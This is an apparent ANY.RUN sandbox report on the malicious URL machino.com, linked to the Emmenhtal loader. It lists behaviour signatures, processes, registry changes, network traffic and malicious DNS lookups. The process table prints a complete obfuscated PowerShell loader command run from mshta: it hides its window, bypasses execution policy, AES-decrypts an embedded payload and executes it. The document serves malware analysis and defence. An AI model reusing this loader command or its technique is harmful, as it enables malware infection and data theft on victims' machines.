| URL: | https://machino.com/ |
| Full analysis: | https://app.any.run/tasks/44b4ea6e-d18e-4e08-bbde-7f7da7cfa04a |
| Verdict: | Malicious activity |
| Threats: | First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments. |
| Analysis date: | December 17, 2024, 10:52:55 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MD5: | 6AC96A19AA57329E3797AC4648B1D94C |
| SHA1: | D0882FADDDB23CCFF8862D860A2A5F55F29D561A |
| SHA256: | 27DAF7B50FFC7B817BF4754913E51EED832555C3AAB7B8EA4DA4A13109424D4B |
| SSDEEP: | 3:N8u3:2q |
MALICIOUS
Changes powershell execution policy (Unrestricted)
- mshta.exe (PID: 6984)
Run PowerShell with an invisible window
- powershell.exe (PID: 6068)
- powershell.exe (PID: 7008)
EMMENHTAL loader has been detected
- powershell.exe (PID: 6068)
Uses AES cipher (POWERSHELL)
- powershell.exe (PID: 6068)
Downloads the requested resource (POWERSHELL)
- powershell.exe (PID: 6068)
- powershell.exe (PID: 7008)
Changes powershell execution policy (Bypass)
- powershell.exe (PID: 6068)
Bypass execution policy to execute commands
- powershell.exe (PID: 7008)
Script downloads file (POWERSHELL)
- powershell.exe (PID: 7008)
SUSPICIOUS
Probably obfuscated PowerShell command line is found
- mshta.exe (PID: 6984)
Executes script without checking the security policy
- powershell.exe (PID: 6068)
- powershell.exe (PID: 7008)
The process bypasses the loading of PowerShell profile settings
- mshta.exe (PID: 6984)
- powershell.exe (PID: 6068)
Starts POWERSHELL.EXE for commands execution
- mshta.exe (PID: 6984)
- powershell.exe (PID: 6068)
Base64-obfuscated command line is found
- mshta.exe (PID: 6984)
Writes data into a file (POWERSHELL)
- powershell.exe (PID: 6068)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 7008)
Starts a new process with hidden mode (POWERSHELL)
- powershell.exe (PID: 6068)
INFO
Connects to unusual port
- chrome.exe (PID: 6324)
The process uses the downloaded file
- mshta.exe (PID: 6984)
- powershell.exe (PID: 6068)
Checks proxy server information
- mshta.exe (PID: 6984)
- powershell.exe (PID: 6068)
Manual execution by a user
- mshta.exe (PID: 6984)
Reads Internet Explorer settings
- mshta.exe (PID: 6984)
Gets data length (POWERSHELL)
- powershell.exe (PID: 6068)
- powershell.exe (PID: 7008)
Application launched itself
- chrome.exe (PID: 3736)
Checks whether the specified file exists (POWERSHELL)
- powershell.exe (PID: 6068)
Creates or changes the value of an item property via Powershell
- powershell.exe (PID: 6068)
Disables trace logs
- powershell.exe (PID: 6068)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 6068)
Uses string split method (POWERSHELL)
- powershell.exe (PID: 6068)
Uses string replace method (POWERSHELL)
- powershell.exe (PID: 6068)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
155
Monitored processes
22
Malicious processes
3
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1228 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=3492 --field-trial-handle=1872,i,14890614565711270296,13033336336014657433,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 122.0.6261.70 Modules
| |||||||||||||||
| 1304 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.3636 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoABAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=3616 --field-trial-handle=1872,i,14890614565711270296,13033336336014657433,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Chrome Exit code: 0 Version: 122.0.6261.70 Modules
| |||||||||||||||
| 2088 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=5432 --field-trial-handle=1872,i,14890614565711270296,13033336336014657433,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 122.0.6261.70 Modules
| |||||||||||||||
| 2216 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=5432 --field-trial-handle=1872,i,14890614565711270296,13033336336014657433,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 122.0.6261.70 Modules
| |||||||||||||||
| 3364 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=3576 --field-trial-handle=1872,i,14890614565711270296,13033336336014657433,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 122.0.6261.70 Modules
| |||||||||||||||
| 3552 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3736 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --disk-cache-dir=null --disk-cache-size=1 --media-cache-size=1 --disable-gpu-shader-disk-cache --disable-background-networking --disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints "https://machino.com/" | C:\Program Files\Google\Chrome\Application\chrome.exe | explorer.exe | ||||||||||||
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Chrome Version: 122.0.6261.70 Modules
| |||||||||||||||
| 5028 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=3844 --field-trial-handle=1872,i,14890614565711270296,13033336336014657433,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 122.0.6261.70 Modules
| |||||||||||||||
| 5300 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6068 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function dmOv($HHdNM){return -split ($HHdNM -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$GBzi = dmOv('B693FFBF7A060F56FBBCAE8CE88B257F84F442EE8B95427C275AE63E7D69C7597740370019E4339B28D30198734C601900C8DAEAB1EEE71BE84475B1934A240728951A62FDA998D6E6C4EBF49348EC0744CDC1514363764C2184A74EFFD3216756393C23336DBF2DD8C465A510ACAFEE7F62691E6E99B399D27A12130CCD26E07AE49E73592CBD196691CFB762F6F8B01686867DF3C9787CCC21294DAB4E2045C9239FC2CE2D835AE91E3E87EDA55B25765A0A79887540181F808EC3FC8AC7245EC842BB8760B925E622AC945DA4E53F2851A4CC5CCABB93BB11559EF93B23CDA96847C6654BED2019ABDB2A3B1FC5B39045214EEA3F3A47A19A52FA8E42614E09C16E84BE2EC0544784E8A32DFE11567CCAC6C161203B5F3FB8385BE0DE8159A92A563F0DBF91C6F5D1E8D337D1DF748544FFF36E9B0729031BCFD2B847565C5749A76AC7D8654A34DC60C8DA4A028759FAD505399509817D774EF7514124380C863EA15423B4940A09FCDB29A142A95A0E601B04F30BF8BDD2D6C1513D3371AE7573B52750059CFD5BDEB5820A8A65E5E92CB99D95211C8FFFB1AFE0D610D53AC1B764681DF77FAD36E1266F9A7E3155A57BDE68EDD8E4F1B14059E881E3410A5EB6731156D7A4B86B449966F15197DB72797260508461560C4D1282AECC21876E5CF9433F2F57E1E5FC3125188D6F9CD13D378121F7089ACD4089BCEC6B9199569F3C577CC348C311D56BEDBE453964FB013791EB8B7F709455DDDA018CBFE8E626E7D521278F328C758EA00008424ECC889E8A79EB27E59F1861632CAD34273CDBF04937BB15169A520BF966A90E0D5A5D12919F526C854836F995316D8C1555CCB9B51EC2CC9127030C533C165218DACD1C98757BB0FBCE4831F99C582B190F13E957FAA05EC10C699E802915467EED946256C51869944123A938CC6D9D2A778B8E7EE5C5FEA9D1456417AEAEA2DB4BBD714E1C9F1CD6A31D057C82FE26E4930580F91AE80226AD99AFC5D45040FFE601409EA1D290E642B8EE724457D4CAC7DA0A9A11074B9988D8ADF074E3FAEC7877565A1C4138D4A4226B427F92EAA0D469BF091C9142C262A5EDE9651206BC6FE91BC1B11FFF1D371AA8277E28AB0E4344A3FF4547652C9A25C129C39912224F841197F359A164581087CC0D2BD4408C56C657C7C9380AF304D38C7B3B68CC223DD58846FA479338C4B76241AB850F3710440C21F1105B6D7F36EAB89FBC28851C18EA9EB343C0B2512E17A4D1C7C69CFD4171E7BB8133C4F46550EC4EB02109BE501D521538F03B8605ADCD1C6E693CC90952B5CF3D90EDEC5863781BFC4F3D953428ECB380640EE66CA4AEF59FBA774DFADB4A0ED2FA1D951A2C69E14EF913EDA4F8E4C1DCFF9C1B92DE802ADD03D5B3A0328FF228AD5CE67D060927B42DED4EFE7D07AD8C77B9C75F630DB4C372F771EFF4A6D73BBE9FF7BBB47223FEE497C5E02230CBD03091024602C6171CFC9792DEE15C1EEA9CCE1A62B7E4D08603791770687F5914BC15B01009FF709BD56906616A7252574EBD01A68EDA817FDB9C2B0E5667A0AE5E29B7A74A3BBEAD7DF8BAB2CEBC564424CAF1C51CF1A77A33E0ABA58CDE71C3466DA2A748C6EA93AA08B9B56DC1C2937B04CC82DC07E1D7FE855D9054748B5FDED610758944826A22C5B4C6CA52C9E81339827631C79D1ED60EF0571EAD9A26B8BA0815E7C98AC0074240047807630B43A43489EF5D2B5521032D5B0814385880DC9FD9A923420193E38B42D82B1777F67DCD648EC0143C5DFC388AF778FA2FC2E6CE786C316855C9BC3CAC2E4F3A7E6197DEF3A22CB45D344EFFCA669E284FFED336A20AE91C4561149BC53190AFC86EC78F5C51C6DDB50C5BEDB27D0166FB24EB62C3B566563C20B08433869469DBF91A6A7A6C93A1EA0F835A28B655CB28EB00C30293A5AF00AE9E5C956371A2BAB5A06B12326074F5EEC07E6C8BB857E1AD6145773CC3D76FA8BA114CC5D1768A44C3067BAF7416F7969EA12F468C61C6380C3CA7217A7A9535A38E87AC09693AADB60FEE62A16A22E73082D7BDCA734E62DCB90AFF0AB95FAB09B55B02768D694411E4E38960D23BD3F911D98D6E8F32636CCBFDA118C6E0CC8123039D594C22187333746636A9A684198A0AAF56EA20688A81AC2490D7BDC10C583601EC54B560F711400D3E59EDE4F39324B9FF40878FB570B15463BFCA2B04ABD72373811B31D0ED32E8A947AAE2079C0C6DCE246AA774B67EEDD7E77575F48BF8A455AD522910A20377CCD5A50A0DC31B168D60875D6CF0D9ACFA8511B8DE12038529E9C20674EEF819133917877ED6E3906C42D8679DC1B3EFE64976ECEFD304298D8DBC30F0DF3991C0E585F83883CC63D6782E1AA30593BA1C08B9D5A19A17E2EEFEC69CC14B9515C824CE7CD68A9AC201A02D109A93A9C51BE76AD47F1A7C579C8CF4E8226FDF7F086486');$BiMmA=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((dmOv('536C4544474446596253715A6E57476C')),[byte[]]::new(16)).TransformFinalBlock($GBzi,0,$GBzi.Length)); & $BiMmA.Substring(0,3) $BiMmA.Substring(187) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
18 277
Read events
18 236
Write events
35
Delete events
6
Modification events
| (PID) Process: | (3736) chrome.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon |
| Operation: | write | Name: | failed_count |
Value: 0 | |||
| (PID) Process: | (3736) chrome.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon |
| Operation: | write | Name: | state |
Value: 2 | |||
| (PID) Process: | (3736) chrome.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon |
| Operation: | write | Name: | state |
Value: 1 | |||
| (PID) Process: | (3736) chrome.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics |
| Operation: | write | Name: | user_experience_metrics.stability.exited_cleanly |
Value: 0 | |||
| (PID) Process: | (3736) chrome.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96} |
| Operation: | write | Name: | usagestats |
Value: 0 | |||
| (PID) Process: | (6984) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (6984) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (6984) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (7008) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (7008) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
Executable files
4
Suspicious files
381
Text files
38
Unknown types
94
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3736 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old~RF1369f8.TMP | — | |
MD5:— | SHA256:— | |||
| 3736 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old | — | |
MD5:— | SHA256:— | |||
| 3736 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF136a08.TMP | — | |
MD5:— | SHA256:— | |||
| 3736 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old~RF136a08.TMP | — | |
MD5:— | SHA256:— | |||
| 3736 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 3736 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old~RF136a08.TMP | — | |
MD5:— | SHA256:— | |||
| 3736 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 3736 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\discounts_db\LOG.old~RF136a27.TMP | — | |
MD5:— | SHA256:— | |||
| 3736 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old~RF136a27.TMP | — | |
MD5:— | SHA256:— | |||
| 3736 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\discounts_db\LOG.old | — | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
31
TCP/UDP connections
89
DNS requests
77
Threats
6
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.16.164.106:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D | unknown | — | — | whitelisted |
7052 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
7052 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
6984 | mshta.exe | GET | 200 | 142.250.186.99:80 | http://c.pki.goog/r/r4.crl | unknown | — | — | whitelisted |
6984 | mshta.exe | GET | 200 | 142.250.186.99:80 | http://c.pki.goog/r/gsr1.crl | unknown | — | — | whitelisted |
4980 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | — | — | whitelisted |
1520 | svchost.exe | HEAD | 200 | 34.104.35.123:80 | http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabjdbkjdpjbpigfodbdjmbglcoo_2024.12.14.01_all_e3s3pxuydvrca43mi6hdgphvru.crx3 | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5064 | SearchApp.exe | 2.23.209.161:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
— | — | 51.124.78.146:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.16.164.106:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
4712 | MoUsoCoreWorker.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
2548 | svchost.exe | 51.124.78.146:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
3736 | chrome.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
6324 | chrome.exe | 142.251.168.84:443 | accounts.google.com | GOOGLE | US | whitelisted |
6324 | chrome.exe | 152.67.3.57:443 | machino.com | ORACLE-BMC-31898 | IN | unknown |
6324 | chrome.exe | 104.17.24.14:443 | cdnjs.cloudflare.com | CLOUDFLARENET | — | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.bing.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
machino.com |
| unknown |
accounts.google.com |
| whitelisted |
cdnjs.cloudflare.com |
| whitelisted |
data-seed-prebsc-1-s1.bnbchain.org |
| malicious |
_8545._https.data-seed-prebsc-1-s1.bnbchain.org |
| malicious |
ajax.googleapis.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
6324 | chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Cloudflare content delivery network (cdnjs .cloudflare .com) |
6324 | chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Cloudflare content delivery network (cdnjs .cloudflare .com) |
6324 | chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Google Hosted Libraries (ajax .googleapis .com) |
6324 | chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Google Hosted Libraries (ajax .googleapis .com) |
6324 | chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Google Hosted Libraries (ajax .googleapis .com) |
6324 | chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Google Hosted Libraries (ajax .googleapis .com) |